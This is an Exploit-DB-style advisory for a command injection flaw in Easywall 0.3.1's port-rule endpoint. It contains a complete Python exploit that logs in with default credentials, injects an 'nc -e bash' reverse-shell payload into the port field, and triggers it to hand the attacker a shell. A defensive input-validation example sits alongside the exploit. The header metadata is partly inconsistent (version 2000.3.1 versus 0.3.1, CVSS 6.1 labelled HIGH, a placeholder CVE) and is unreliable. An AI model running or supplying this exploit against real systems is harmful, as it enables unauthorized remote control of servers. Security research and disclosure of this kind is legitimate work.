Vendor: Easywall
By: Melvin Mejia
CVSS: 6.1 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: Easywall
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: NO
Related CWE: CVE-2023-XXXX (Not real CVE, placeholder)
CPE: a:easywall:easywall:0.3.1
Platforms Tested: Ubuntu 22.04
2023

Easywall 0.3.1 – Authenticated Remote Command Execution

Easywall 0.3.1 allows an authenticated user to execute arbitrary commands on the target system through a command injection vulnerability in the 'port' parameter of the /ports-save request. The injected value is saved with the port rule and runs when the rules are applied through /apply-save, which gives the attacker unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, update to a patched version of the Easywall software. Additionally, implement server-side input validation so that user-supplied data is checked before it is used.
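One way to implement the input validation recommended above, as an added example that is not Easywall's own code: the port field is matched against a strict allowlist and the rule is built as an argument vector so no shell parses it. The function names, the "low:high" range syntax and the iptables rule shape are assumptions made for illustration.

```python
import re

# Assumption: the port field holds one port or an iptables-style "low:high" range.
_PORT_RE = re.compile(r"([0-9]{1,5})(?::([0-9]{1,5}))?")
_PROTOCOLS = ("tcp", "udp")


def parse_port_field(value):
    """Return (low, high) for a well-formed port field, else raise ValueError."""
    # fullmatch() anchors both ends, so ';', spaces, '#', '$(', backticks and
    # a trailing newline are all rejected instead of being stripped or escaped.
    match = _PORT_RE.fullmatch(value) if isinstance(value, str) else None
    if match is None:
        raise ValueError(f"port field is not numeric: {value!r}")
    low = int(match.group(1))
    high = int(match.group(2)) if match.group(2) else low
    if not 1 <= low <= high <= 65535:
        raise ValueError(f"port out of range: {value!r}")
    return low, high


def build_rule_argv(port_field, proto):
    """Build the rule as an argument vector so no shell ever parses the input."""
    if proto not in _PROTOCOLS:
        raise ValueError(f"unsupported protocol: {proto!r}")
    low, high = parse_port_field(port_field)
    dport = str(low) if low == high else f"{low}:{high}"
    # Pass this list to subprocess.run(argv, check=True); never join it into a string.
    return ["iptables", "-A", "INPUT", "-p", proto, "--dport", dport, "-j", "ACCEPT"]


def is_accepted(port_field, proto="tcp"):
    """True when the submitted values pass validation."""
    try:
        build_rule_argv(port_field, proto)
        return True
    except ValueError:
        return False


# Constructed sample submissions (not captured traffic).
SAMPLES = ["22", "8000:8100", "123;id #", "123\n", "0", "70000", "9000:8000", "$(id)"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:14} -> {'accept' if is_accepted(sample) else 'reject'}")
```

Rejecting malformed input outright, rather than trying to strip dangerous characters, keeps the check independent of whichever shell metacharacters a later code path might interpret.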

Exploit-DB raw data:

# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04

import requests, json, urllib3
urllib3.disable_warnings()

def exploit():
    
    # Replace values needed here
    target_host = "192.168.1.25"
    target_port= "12227"
    lhost = "192.168.1.10"
    lport = "9001"
    user = "admin"
    password = "admin"
    
    target = f"https://{target_host}:{target_port}"

    # Authenticate to the app
    print("[+] Attempting login with the provided credentials...")
    login_data = {"username":user, "password":password}
    session = requests.session()
    try:
        login = session.post(f'{target}/login',data=login_data,verify=False)
    except Exception as ex:
        print("[!] There was a problem connecting to the app, error:", ex)
        exit(1)

    if login.status_code != 200:
        print("[!] Login failed.")
        exit(1)
    else:
        print("[+] Login successful.")
    
    # Send the payload, the port parameter suffers from a command injection vulnerability
    print("[+] Attempting to send payload.")
    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
    if send_payload.status_code != 200:
        print("[!] Failed to send payload.")
        exit(1)
    else:
        print("[+] Payload sent.")

    # Trigger the execution of the payload
    print("[+] Attempting execution.")
    data = {"step_1":"", "step_2":""}
    execute = session.post(f"{target}/apply-save",data=data, verify=False)
    if execute.status_code != 200:
        print("[!] Attempt to execute failed.")
        exit(1)
    else:
        print(f"[+] Execution succeeded, you should have gotten a shell at {lhost}:{lport}.")

exploit()